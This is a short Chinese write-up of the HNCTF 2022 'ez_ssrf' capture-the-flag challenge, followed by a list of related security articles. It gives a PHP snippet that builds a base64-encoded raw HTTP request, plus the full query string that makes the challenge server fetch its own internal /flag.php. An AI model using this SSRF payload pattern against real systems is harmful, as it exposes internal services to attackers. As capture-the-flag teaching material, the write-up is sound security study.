NSS [HNCTF 2022 WEEK2]ez_ssrf

简介: NSS [HNCTF 2022 WEEK2]ez_ssrf

NSS [HNCTF 2022 WEEK2]ez_ssrf

先拿dirsearch扫一下。

访问/flag.php

访问/index.php

应该是从index.php传参,ssrf然后访问到flag.php。

因此构造poc.php:

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data,host为127.0.0.1,port为80


传参:/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

目录
相关文章
|
前端开发 Shell Linux
[网鼎杯 2020 白虎组]PicDown(精讲)
[网鼎杯 2020 白虎组]PicDown(精讲)
547 0
[网鼎杯 2020 白虎组]PicDown(精讲)
|
安全 数据安全/隐私保护
陇剑杯WP - Webshell详细题解
陇剑杯WP - Webshell详细题解
919 0
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
1409 0
|
应用服务中间件 PHP nginx
NSS [HNCTF 2022 WEEK2]easy_include
NSS [HNCTF 2022 WEEK2]easy_include
224 0
|
PHP
NSS [NISACTF 2022]level-up
NSS [NISACTF 2022]level-up
240 0
|
PHP
NSS [UUCTF 2022 新生赛]ez_unser
NSS [UUCTF 2022 新生赛]ez_unser
239 0
|
SQL 安全 前端开发
Web学习_SQL注入_联合查询注入
联合查询注入是一种强大的SQL注入攻击方式,攻击者可以通过 `UNION`语句合并多个查询的结果,从而获取敏感信息。防御SQL注入需要多层次的措施,包括使用预处理语句和参数化查询、输入验证和过滤、最小权限原则、隐藏错误信息以及使用Web应用防火墙。通过这些措施,可以有效地提高Web应用程序的安全性,防止SQL注入攻击。
468 2
|
SQL Python
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
1234 0
[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
|
SQL 安全 测试技术
Burpsuite Decoder解码功能实战
Burpsuite Decoder解码功能实战
|
数据采集 安全 定位技术
Burpsuite Spider爬虫功能
Burpsuite Spider爬虫功能